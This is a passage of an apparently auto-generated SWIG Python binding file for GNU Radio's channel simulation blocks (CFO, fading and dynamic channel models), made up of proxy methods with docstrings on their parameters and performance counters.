_channels_swig.channel_model2_sptr_name(self) def symbol_name(self): """symbol_name(channel_model2_sptr self) -> std::string""" return _channels_swig.channel_model2_sptr_symbol_name(self) def input_signature(self): """input_signature(channel_model2_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model2_sptr_input_signature(self) def output_signature(self): """output_signature(channel_model2_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model2_sptr_output_signature(self) def unique_id(self): """unique_id(channel_model2_sptr self) -> long""" return _channels_swig.channel_model2_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(channel_model2_sptr self) -> basic_block_sptr""" return _channels_swig.channel_model2_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(channel_model2_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.channel_model2_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(channel_model2_sptr self) -> std::string""" return _channels_swig.channel_model2_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(channel_model2_sptr self, std::string name)""" return _channels_swig.channel_model2_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(channel_model2_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.channel_model2_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(channel_model2_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model2_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(channel_model2_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model2_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(channel_model2_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.channel_model2_sptr_message_subscribers(self, *args, **kwargs) channel_model2_sptr_swigregister = _channels_swig.channel_model2_sptr_swigregister channel_model2_sptr_swigregister(channel_model2_sptr) channel_model2_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) channel_model2 = channel_model2.make; class cfo_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::cfo_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::cfo_model)> self) -> cfo_model_sptr __init__(boost::shared_ptr<(gr::channels::cfo_model)> self, cfo_model p) -> cfo_model_sptr """ this = _channels_swig.new_cfo_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(cfo_model_sptr self) -> cfo_model""" return _channels_swig.cfo_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_cfo_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(cfo_model_sptr self, double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> cfo_model_sptr channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.cfo_model_sptr_make(self, *args, **kwargs) def set_std_dev(self, *args, **kwargs): """set_std_dev(cfo_model_sptr self, double _dev)""" return _channels_swig.cfo_model_sptr_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(cfo_model_sptr self, double _dev)""" return _channels_swig.cfo_model_sptr_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(cfo_model_sptr self, double _rate)""" return _channels_swig.cfo_model_sptr_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_std_dev(self) def max_dev(self): """max_dev(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_max_dev(self) def samp_rate(self): """samp_rate(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_samp_rate(self) def history(self): """history(cfo_model_sptr self) -> unsigned int""" return _channels_swig.cfo_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(cfo_model_sptr self, int which, int delay) declare_sample_delay(cfo_model_sptr self, unsigned int delay) """ return _channels_swig.cfo_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(cfo_model_sptr self, int which) -> unsigned int""" return _channels_swig.cfo_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_relative_rate(self) def start(self): """start(cfo_model_sptr self) -> bool""" return _channels_swig.cfo_model_sptr_start(self) def stop(self): """stop(cfo_model_sptr self) -> bool""" return _channels_swig.cfo_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(cfo_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.cfo_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(cfo_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.cfo_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(cfo_model_sptr self, int m)""" return _channels_swig.cfo_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(cfo_model_sptr self)""" return _channels_swig.cfo_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(cfo_model_sptr self) -> bool""" return _channels_swig.cfo_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(cfo_model_sptr self, int m)""" return _channels_swig.cfo_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_min_noutput_items(self) def max_output_buffer(self, *args, **kwargs): """max_output_buffer(cfo_model_sptr self, int i) -> long""" return _channels_swig.cfo_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ set_max_output_buffer(cfo_model_sptr self, long max_output_buffer) set_max_output_buffer(cfo_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.cfo_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(cfo_model_sptr self, int i) -> long""" return _channels_swig.cfo_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(cfo_model_sptr self, long min_output_buffer) set_min_output_buffer(cfo_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.cfo_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(cfo_model_sptr self, int which) -> float pc_input_buffers_full(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(cfo_model_sptr self, int which) -> float pc_input_buffers_full_avg(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(cfo_model_sptr self, int which) -> float pc_input_buffers_full_var(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(cfo_model_sptr self, int which) -> float pc_output_buffers_full(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ pc_output_buffers_full_avg(cfo_model_sptr self, int which) -> float pc_output_buffers_full_avg(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(cfo_model_sptr self, int which) -> float pc_output_buffers_full_var(cfo_model_sptr self) -> pmt_vector_float """ return _channels_swig.cfo_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time(self) def pc_work_time_avg(self): """pc_work_time_avg(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): """pc_work_time_total(cfo_model_sptr self) -> float""" return _channels_swig.cfo_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(cfo_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.cfo_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(cfo_model_sptr self)""" return _channels_swig.cfo_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(cfo_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.cfo_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(cfo_model_sptr self, int priority) -> int""" return _channels_swig.cfo_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(cfo_model_sptr self) -> std::string""" return _channels_swig.cfo_model_sptr_name(self) def symbol_name(self): """symbol_name(cfo_model_sptr self) -> std::string""" return _channels_swig.cfo_model_sptr_symbol_name(self) def input_signature(self): """input_signature(cfo_model_sptr self) -> io_signature_sptr""" return _channels_swig.cfo_model_sptr_input_signature(self) def output_signature(self): """output_signature(cfo_model_sptr self) -> io_signature_sptr""" return _channels_swig.cfo_model_sptr_output_signature(self) def unique_id(self): """unique_id(cfo_model_sptr self) -> long""" return _channels_swig.cfo_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(cfo_model_sptr self) -> basic_block_sptr""" return _channels_swig.cfo_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(cfo_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.cfo_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(cfo_model_sptr self) -> std::string""" return _channels_swig.cfo_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(cfo_model_sptr self, std::string name)""" return _channels_swig.cfo_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(cfo_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.cfo_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(cfo_model_sptr self) -> swig_int_ptr""" return _channels_swig.cfo_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(cfo_model_sptr self) -> swig_int_ptr""" return _channels_swig.cfo_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(cfo_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.cfo_model_sptr_message_subscribers(self, *args, **kwargs) cfo_model_sptr_swigregister = _channels_swig.cfo_model_sptr_swigregister cfo_model_sptr_swigregister(cfo_model_sptr) cfo_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) cfo_model = cfo_model.make; class dynamic_channel_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::dynamic_channel_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::dynamic_channel_model)> self) -> dynamic_channel_model_sptr __init__(boost::shared_ptr<(gr::channels::dynamic_channel_model)> self, dynamic_channel_model p) -> dynamic_channel_model_sptr """ this = _channels_swig.new_dynamic_channel_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(dynamic_channel_model_sptr self) -> dynamic_channel_model""" return _channels_swig.dynamic_channel_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_dynamic_channel_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(dynamic_channel_model_sptr self, double samp_rate, double sro_std_dev, double sro_max_dev, double cfo_std_dev, double cfo_max_dev, unsigned int N, double doppler_freq, bool LOS_model, float K, pmt_vector_float delays, pmt_vector_float mags, int ntaps_mpath, double noise_amp, double noise_seed) -> dynamic_channel_model_sptr dynamic channel simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ return _channels_swig.dynamic_channel_model_sptr_make(self, *args, **kwargs) def samp_rate(self): """samp_rate(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_samp_rate(self) def sro_dev_std(self): """sro_dev_std(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_sro_dev_std(self) def sro_dev_max(self): """sro_dev_max(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_sro_dev_max(self) def cfo_dev_std(self): """cfo_dev_std(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_cfo_dev_std(self) def cfo_dev_max(self): """cfo_dev_max(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_cfo_dev_max(self) def noise_amp(self): """noise_amp(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_noise_amp(self) def doppler_freq(self): """doppler_freq(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_doppler_freq(self) def K(self): """K(dynamic_channel_model_sptr self) -> double""" return _channels_swig.dynamic_channel_model_sptr_K(self) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_samp_rate(self, *args, **kwargs) def set_sro_dev_std(self, *args, **kwargs): """set_sro_dev_std(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_sro_dev_std(self, *args, **kwargs) def set_sro_dev_max(self, *args, **kwargs): """set_sro_dev_max(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_sro_dev_max(self, *args, **kwargs) def set_cfo_dev_std(self, *args, **kwargs): """set_cfo_dev_std(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_cfo_dev_std(self, *args, **kwargs) def set_cfo_dev_max(self, *args, **kwargs): """set_cfo_dev_max(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_cfo_dev_max(self, *args, **kwargs) def set_noise_amp(self, *args, **kwargs): """set_noise_amp(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_noise_amp(self, *args, **kwargs) def set_doppler_freq(self, *args, **kwargs): """set_doppler_freq(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_doppler_freq(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(dynamic_channel_model_sptr self, double arg2)""" return _channels_swig.dynamic_channel_model_sptr_set_K(self, *args, **kwargs) def primitive_connect(self, *args): """ primitive_connect(dynamic_channel_model_sptr self, basic_block_sptr block) primitive_connect(dynamic_channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.dynamic_channel_model_sptr_primitive_connect(self, *args) def primitive_msg_connect(self, *args): """ primitive_msg_connect(dynamic_channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_connect(dynamic_channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.dynamic_channel_model_sptr_primitive_msg_connect(self, *args) def primitive_msg_disconnect(self, *args): """ primitive_msg_disconnect(dynamic_channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_disconnect(dynamic_channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.dynamic_channel_model_sptr_primitive_msg_disconnect(self, *args) def primitive_disconnect(self, *args): """ primitive_disconnect(dynamic_channel_model_sptr self, basic_block_sptr block) primitive_disconnect(dynamic_channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.dynamic_channel_model_sptr_primitive_disconnect(self, *args) def disconnect_all(self): """disconnect_all(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_disconnect_all(self) def lock(self): """lock(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_lock(self) def unlock(self): """unlock(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_unlock(self) def primitive_message_port_register_hier_in(self, *args, **kwargs): """primitive_message_port_register_hier_in(dynamic_channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.dynamic_channel_model_sptr_primitive_message_port_register_hier_in(self, *args, **kwargs) def primitive_message_port_register_hier_out(self, *args, **kwargs): """primitive_message_port_register_hier_out(dynamic_channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.dynamic_channel_model_sptr_primitive_message_port_register_hier_out(self, *args, **kwargs) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(dynamic_channel_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.dynamic_channel_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(dynamic_channel_model_sptr self)""" return _channels_swig.dynamic_channel_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(dynamic_channel_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.dynamic_channel_model_sptr_processor_affinity(self) def to_hier_block2(self): """to_hier_block2(dynamic_channel_model_sptr self) -> hier_block2_sptr""" return _channels_swig.dynamic_channel_model_sptr_to_hier_block2(self) def name(self): """name(dynamic_channel_model_sptr self) -> std::string""" return _channels_swig.dynamic_channel_model_sptr_name(self) def symbol_name(self): """symbol_name(dynamic_channel_model_sptr self) -> std::string""" return _channels_swig.dynamic_channel_model_sptr_symbol_name(self) def input_signature(self): """input_signature(dynamic_channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.dynamic_channel_model_sptr_input_signature(self) def output_signature(self): """output_signature(dynamic_channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.dynamic_channel_model_sptr_output_signature(self) def unique_id(self): """unique_id(dynamic_channel_model_sptr self) -> long""" return _channels_swig.dynamic_channel_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(dynamic_channel_model_sptr self) -> basic_block_sptr""" return _channels_swig.dynamic_channel_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(dynamic_channel_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.dynamic_channel_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(dynamic_channel_model_sptr self) -> std::string""" return _channels_swig.dynamic_channel_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(dynamic_channel_model_sptr self, std::string name)""" return _channels_swig.dynamic_channel_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(dynamic_channel_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.dynamic_channel_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(dynamic_channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.dynamic_channel_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(dynamic_channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.dynamic_channel_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(dynamic_channel_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.dynamic_channel_model_sptr_message_subscribers(self, *args, **kwargs) dynamic_channel_model_sptr_swigregister = _channels_swig.dynamic_channel_model_sptr_swigregister dynamic_channel_model_sptr_swigregister(dynamic_channel_model_sptr) dynamic_channel_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) dynamic_channel_model = dynamic_channel_model.make; class fading_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::fading_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::fading_model)> self) -> fading_model_sptr __init__(boost::shared_ptr<(gr::channels::fading_model)> self, fading_model p) -> fading_model_sptr """ this = _channels_swig.new_fading_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(fading_model_sptr self) -> fading_model""" return _channels_swig.fading_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_fading_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(fading_model_sptr self, unsigned int N, float fDTs=0.01, bool LOS=True, float K=4, int seed=0) -> fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ return _channels_swig.fading_model_sptr_make(self, *args, **kwargs) def fDTs(self): """fDTs(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_fDTs(self) def K(self): """K(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_K(self) def step(self): """step(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(fading_model_sptr self, float fDTs)""" return _channels_swig.fading_model_sptr_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(fading_model_sptr self, float K)""" return _channels_swig.fading_model_sptr_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(fading_model_sptr self, float step)""" return _channels_swig.fading_model_sptr_set_step(self, *args, **kwargs) def history(self): """history(fading_model_sptr self) -> unsigned int""" return _channels_swig.fading_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(fading_model_sptr self, int which, int delay) declare_sample_delay(fading_model_sptr self, unsigned int delay) """ return _channels_swig.fading_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(fading_model_sptr self, int which) -> unsigned int""" return _channels_swig.fading_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(fading_model_sptr self) -> double""" return _channels_swig.fading_model_sptr_relative_rate(self) def start(self): """start(fading_model_sptr self) -> bool""" return _channels_swig.fading_model_sptr_start(self) def stop(self): """stop(fading_model_sptr self) -> bool""" return _channels_swig.fading_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(fading_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.fading_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(fading_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.fading_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(fading_model_sptr self, int m)""" return _channels_swig.fading_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(fading_model_sptr self)""" return _channels_swig.fading_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(fading_model_sptr self) -> bool""" return _channels_swig.fading_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(fading_model_sptr self, int m)""" return _channels_swig.fading_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_min_noutput_items(self) def max_output_buffer(self, *args, **kwargs): """max_output_buffer(fading_model_sptr self, int i) -> long""" return _channels_swig.fading_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ set_max_output_buffer(fading_model_sptr self, long max_output_buffer) set_max_output_buffer(fading_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.fading_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(fading_model_sptr self, int i) -> long""" return _channels_swig.fading_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(fading_model_sptr self, long min_output_buffer) set_min_output_buffer(fading_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.fading_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(fading_model_sptr self, int which) -> float pc_input_buffers_full(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(fading_model_sptr self, int which) -> float pc_input_buffers_full_avg(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(fading_model_sptr self, int which) -> float pc_input_buffers_full_var(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(fading_model_sptr self, int which) -> float pc_output_buffers_full(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ pc_output_buffers_full_avg(fading_model_sptr self, int which) -> float pc_output_buffers_full_avg(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(fading_model_sptr self, int which) -> float 